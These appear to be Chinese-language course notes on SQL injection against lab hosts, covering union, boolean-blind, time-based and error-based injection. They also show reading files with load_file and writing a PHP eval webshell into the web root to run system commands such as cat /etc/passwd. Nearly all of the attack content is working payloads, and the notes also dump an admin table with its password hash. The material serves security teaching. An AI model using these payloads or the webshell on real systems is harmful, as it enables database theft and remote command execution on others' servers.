sql注入常见分类


" 字符型注入

整数型注入

?id=1

select * from users where id = 1 #

select * from users where id = 1 union select * from users

?id=1
?id=1'
?id=1"
?id=1 and 1=1
?id=1 and 1=2

image-20221204090400135

http://hazelshishuaige.club:28199/?id=1 and 1=2

http://hazelshishuaige.club:28199/?id=1.1 or 1=1

http://hazelshishuaige.club:28199/?id=1.1 union select 1,2
（id=1.1 或 id=-1 的作用是让原查询命中不到任何行，页面才会把 union 那一行的结果显示出来；union 的列数必须与原查询一致，可先用 order by N 确定）

http://hazelshishuaige.club:28199/?id=1.1 union select 1,group_concat(schema_name) from information_schema.schemata

http://hazelshishuaige.club:28199/?id=1.1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

http://hazelshishuaige.club:28199/?id=1.1 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'

http://hazelshishuaige.club:28199/?id=1.1 union select 1,group_concat(flag) from flag

文件读写

1. 文件权限：以下条件需同时满足才能通过注入读写文件
   - 当前数据库账号拥有 FILE 权限
   - secure_file_priv 允许（这是只读的全局变量，只能在 my.cnf/启动参数中设置，运行时无法修改，因此注入时不能绕过）：
     空          不限制目录，可任意读写
     NULL        禁止导入导出，功能关闭
     指定目录     只能在该目录下读写（本例为 /var/lib/mysql；很多发行版默认是 /var/lib/mysql-files/）
MariaDB [(none)]> show variables like 'secure_file_priv';
+------------------+-------+
| Variable_name | Value |
+------------------+-------+
| secure_file_priv | |
+------------------+-------+
1 row in set (0.001 sec)

2. 进程用户
落盘的文件由 mysqld 进程所属的操作系统用户创建（通常是 mysql，容器或实验环境中有时是 root），文件的属主/属组也随之而定；这与数据库里的 root 账号是两回事。

3. 目录权限
/var/lib/mysql 等目标目录必须对 mysqld 进程用户可读/可写，这是 Linux 文件系统层面的权限问题，与数据库权限无关；写入 /var/www/html 时同理。

文件读写 写入。网站根目录 /var/www/html / 系统根目录
/var/www/html
/var/www/htdoc/localhost/
/usr/share/nginx/html/

配置文件
/etc/nginx/nginx.conf
/etc/apache2/apache2.conf        （Debian/Ubuntu 的 Apache）
/etc/httpd/conf/httpd.conf       （RHEL/CentOS 的 Apache）

# /etc/apache2/
# |-- apache2.conf
# | `-- ports.conf
# |-- mods-enabled
# | |-- *.load
# | `-- *.conf
# |-- conf-enabled
# | `-- *.conf
# `-- sites-enabled
# `-- *.conf
root@e3cebf7bcc19:/etc/apache2# cd sites-available/
root@e3cebf7bcc19:/etc/apache2/sites-available# ls
000-default.conf default-ssl.conf
root@e3cebf7bcc19:/etc/apache2/sites-available# cat 000-default.conf
<VirtualHost *:80>
# The ServerName directive sets the request scheme, hostname and port that
# the server uses to identify itself. This is used when creating
# redirection URLs. In the context of virtual hosts, the ServerName
# specifies what hostname must appear in the request's Host: header to
# match this virtual host. For the default virtual host (this file) this
# value is not decisive as it is used as a last resort host regardless.
# However, you must set it for any further virtual host explicitly.
#ServerName www.example.com

ServerAdmin webmaster@localhost
DocumentRoot /var/www/html

# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the loglevel for particular
# modules, e.g.
#LogLevel info ssl:warn

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

# For most configuration files from conf-available/, which are
# enabled or disabled at a global level, it is possible to
# include a line for only one particular virtual host. For example the
# following line enables the CGI configuration for this host only
# after it has been globally disabled with "a2disconf".
#Include conf-available/serve-cgi-bin.conf
</VirtualHost>

# vim: syntax=apache ts=4 sw=4 sts=4 sr noet

load_file() 读文件（需 FILE 权限、secure_file_priv 允许，且 mysqld 进程用户对该文件有读权限；文件不存在或无权限时返回 NULL 而不报错）
into outfile 写文件（同样受 FILE 权限与 secure_file_priv 限制，目标目录需对 mysqld 进程用户可写）

路径必须是绝对路径，如 /var/www/html/index.php；不能使用 ../index.php 这类相对路径。

load_file('/etc/passwd')

http://hazelshishuaige.club:28199/index.php?id=-1 union select 1,load_file('/etc/nginx/nginx.conf')

http://hazelshishuaige.club:28199/index.php?id=-1 union select 1,3 into outfile '/var/www/html/1.txt'

写入过程中，INTO OUTFILE 不会覆盖已经存在的文件（报错 File already exists），自己刚写入的文件同样无法再次覆盖；不存在的文件会自动创建，因此每次写入都要换一个新的文件名。写入 PHP 文件时，以下面的一句话木马为例：

一句话木马

<?php @eval($_REQUEST['cmd']); ?>

（数组下标要加引号：$_REQUEST[cmd] 在 PHP 7 只会产生 Notice，在 PHP 8 会因未定义常量直接报 Fatal error，木马无法执行；@ 只是抑制告警输出）

执行命令
eval() 函数,执行php代码
?cmd=phpinfo();


http://hazelshishuaige.club:28199/1.php?cmd=system('ls -al /');

system() 函数 执行系统命令

linux:
ls 列出当前目录下的文件
ls -al / 列出/目录下的所有文件并且显示文件详细信息
whoami 查看当前执行命令的用户（通常是 www-data 等 Web 服务进程的用户，而不是 root）
cd 切换路径
pwd 显示当前所在位置路径
cat /etc/passwd 查看文件 /etc/passwd
nl /etc/passwd 带行号查看文件，cat 被过滤时可作替代（tac、head、tail、less 同理）
// Vulnerable injection point: $id is taken straight from the query string
// with no validation, casting or parameterisation.
$id     = $_GET['id'];
// The value is interpolated into the SQL text unquoted (integer-type
// injection), so ?id=1 union select ... runs as part of this statement.
// Fix: bind the value instead of concatenating it, e.g.
//   $stmt = mysqli_prepare($conn, "select * from news where id=?");
//   mysqli_stmt_bind_param($stmt, "i", $id);
// or at minimum force an integer: $id = (int)$_GET['id'];
$sql = "select * from news where id=$id";
// Executes the string-built query as-is; mysqli_query() runs one statement,
// so stacked queries are not possible here, but UNION/blind/error-based are.
$result = mysqli_query($conn, $sql);
// First row of the result set (or NULL when the query matched nothing,
// which is what the id=1.1 / id=-1 trick relies on to show the UNION row).
$res = mysqli_fetch_array($result);
1.1 union select 1,'<?php eval($_REQUEST["shell"]) ?>'  into outfile '/var/www/html/2.php'

image-20221204100241161

注入点

http://hazelshishuaige.club:28194/backend/content_detail.php?id=1 and 1=2

http://hazelshishuaige.club:28194/backend/content_detail.php?id=1.1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

http://hazelshishuaige.club:28194/backend/content_detail.php?id=1.1 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'

http://hazelshishuaige.club:28194/backend/content_detail.php?id=1.1 union select 1,group_concat(username,password) from admin

http://hazelshishuaige.club:28194/backend/content_detail.php?id=1.1 union select 1,group_concat(username,'----',password) from admin

admin----756ba5042c492a3c2481f29e6b796bd6
（32 位十六进制，形如未加盐 MD5——需验证；可尝试字典/在线查表还原后登录后台）

image-20221204102324540

image-20221204102344273

where id = '1''

id=1'and 1=2#

id=1'order by 4#

id=1.1' union select 1,2,3,4#

id=1.1' union select 1,2,3,group_concat(schema_name) from information_schema.schemata#

id=1.1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#

id=1.1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='fl4g'#

id=1.1' union select 1,2,3,group_concat(skctf_flag) from fl4g#

盲注

bool盲注

bool

true

false

演示:http://hazelshishuaige.club:9901

http://hazelshishuaige.club:9901/Less-8/?id=1.1' union select 1,2,3%23
（# 在 URL 中必须编码为 %23，否则浏览器会把它当作片段标识符，# 之后的内容不会发送到服务器；也可用 -- - 代替）

http://hazelshishuaige.club:9901/Less-8/?id=1' and 1=2%23

字符串截取函数

substr(database(),2,1)            -- 取当前库名的第 2 个字符
substr('123qwe',1,1) = '1'        -- 返回的是字符串 '1'，SQL 中没有 === 运算符

mid(), substr(), left()

substr('asdfsaf',1,3) asd

mid('sladklsdjfls',3,3) adk       -- 从第 3 位开始取 3 个字符，与 substr 用法相同

left('asdfsafaf',4) asdf

ord

ord('a')   97

ascii()函数 —— 与 ord() 相同，返回最左侧字符的 ASCII 码，盲注时用数字比较代替字符比较可以避开引号过滤

ascii('a')   97
char(97)     a       -- 反向转换用 char()，ascii(97) 得到的是 '9' 的码值 57，不是 a

Length()

length('asc')  3
http://hazelshishuaige.club:9901/Less-8/?id=1' and length((select database()))=1%23


?id=1' and length(( select database() ))=1%23

?id=1' and length(( select group_concat(schema_name) from information_schema.schemata ))=1%23

?id=1' and length(( select group_concat(table_name) from information_schema.tables where table_schema=database() ))=1%23

?id=1' and length(( select group_concat(column_name) from information_schema.columns where table_name='users' ))=1%23


?id=1' and substr((( select database() )),2,1)='a'%23

?id=1' and substr((( select group_concat(schema_name) from information_schema.schemata )),2,1)='a'%23

?id=1' and substr((( select group_concat(table_name) from information_schema.tables where table_schema=database() )),2,1)='a'%23

?id=1' and substr((( select group_concat(column_name) from information_schema.columns where table_name='users' )),2,1)='a'%23

?id=1' and substr((( select group_concat(schema_name) from information_schema.schemata )),2,1)='a'%23

image-20221204111808880

image-20221204111826091

image-20221204112455799

Burp Intruder 的攻击模式：

Sniper：只有一个变量（payload 位置）时使用，每次只替换一个位置，其余位置保持原值

Pitchfork：多个位置各用一个字典，按行一一对应同步替换

Cluster bomb：多个位置的字典做笛卡尔积，遍历全部组合；盲注逐位爆破常用（位置 1 = 字符位序，位置 2 = 字符表）

image-20221204112711521

image-20221204112951182

image-20221204113233513

题目地址:

http://hazelshishuaige.club:9901/Less-8/?id=1

要求:跑出当前正在使用的数据库名。 跑出所有数据库的前10位

延时注入

if((条件),true,false)
if((1=1),sleep(5),1)
-- sleep() 对 where 命中的每一行都会执行一次，条件命中多行时延时成倍增加（注入到单行查询或用 limit 1 可避免）；
-- 判断阈值要先测量正常响应时间并留出网络抖动余量，多次复测后再下结论
?id=1' and length(( select database() ))=1%23

if((length(( select database() ))=1),sleep(5),1)
if((length(( select group_concat(schema_name) from information_schema.schemata ))=1),sleep(5),1)
if((length(( select group_concat(table_name) from information_schema.tables where table_schema=database() ))=1),sleep(5),1)
if((length(( select group_concat(column_name) from information_schema.columns where table_name='users' ))=1),sleep(5),1)
if((length(( select group_concat(id,username,password) from users ))=1),sleep(5),1)

if((substr((( select database() )),1,1)='a'),sleep(5),1)
if((substr((( select group_concat(schema_name) from information_schema.schemata )),1,1)='a'),sleep(5),1)
if((substr((( select group_concat(table_name) from information_schema.tables where table_schema=database() )),1,1)='a'),sleep(5),1)
if((substr((( select group_concat(column_name) from information_schema.columns where table_name='users' )),1,1)='a'),sleep(5),1)
if((substr((( select group_concat(id,username,password) from users )),1,1)='a'),sleep(5),1)

image-20221204152507197

password=admaain&username=a'/**/or/**/sleep(3)#
（/**/ 代替空格，用于绕过对空格的过滤；注意 or sleep(3) 会对表中每一行执行一次 sleep，总延时 = 3 秒 × 行数）

password=admaain&username=admin'/**/and/**/sleep(3)#

password=admaain&username=admin'/**/and/**/if((length(( /**/select/**/database()/**/ ))>1),sleep(5),1)#

报错注入

http://hazelshishuaige.club:9901/Less-1/?id=1

updatexml(1,concat(0x7e,(select @@version),0x7e),1)

extractvalue(1,concat(0x7e,(select @@version),0x7e))

select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;
-- 利用重复列名报错回显。NAME_CONST 要求参数为常量，此技巧仅在部分旧版 MySQL 上可用，新版本会报 Incorrect arguments to NAME_CONST，优先使用 updatexml/extractvalue
updatexml(1,concat(0x7e,(select database()),0x7e),1)

updatexml(1,concat(0x7e,( select group_concat(schema_name) from information_schema.schemata ),0x7e),1)

updatexml(1,concat(0x7e,( substr(((select group_concat(schema_name) from information_schema.schemata)),1,31) ),0x7e),1)
-- XPATH 报错信息最多只回显 32 个字符，去掉开头的 ~ 后每次只能看到 31 个字符，所以要用 substr 分段取；substr 的第三个参数是长度不是结束位置

http://hazelshishuaige.club:9901/Less-1/?id=1' and updatexml(1,concat(0x7e,( substr(((select group_concat(schema_name) from information_schema.schemata)),32,31) ),0x7e),1)%23
extractvalue(1,concat(0x7e,(select database()),0x7e))


extractvalue(1,concat(0x7e,( select group_concat(schema_name) from information_schema.schemata ),0x7e))


extractvalue(1,concat(0x7e,( substr((( select group_concat(schema_name) from information_schema.schemata )),1,30) ),0x7e))
-- 同样受 32 字符回显限制：~ + 30 个字符 + ~ 刚好 32，每段取 30 个

extractvalue(1,concat(0x7e,( substr((( select group_concat(schema_name) from information_schema.schemata )),31,30) ),0x7e))
-- 第二段从第 31 位开始再取 30 个（第三个参数是长度，写成 61 会超出回显长度并导致下一段起点错位）

堆叠注入

image-20221204165530312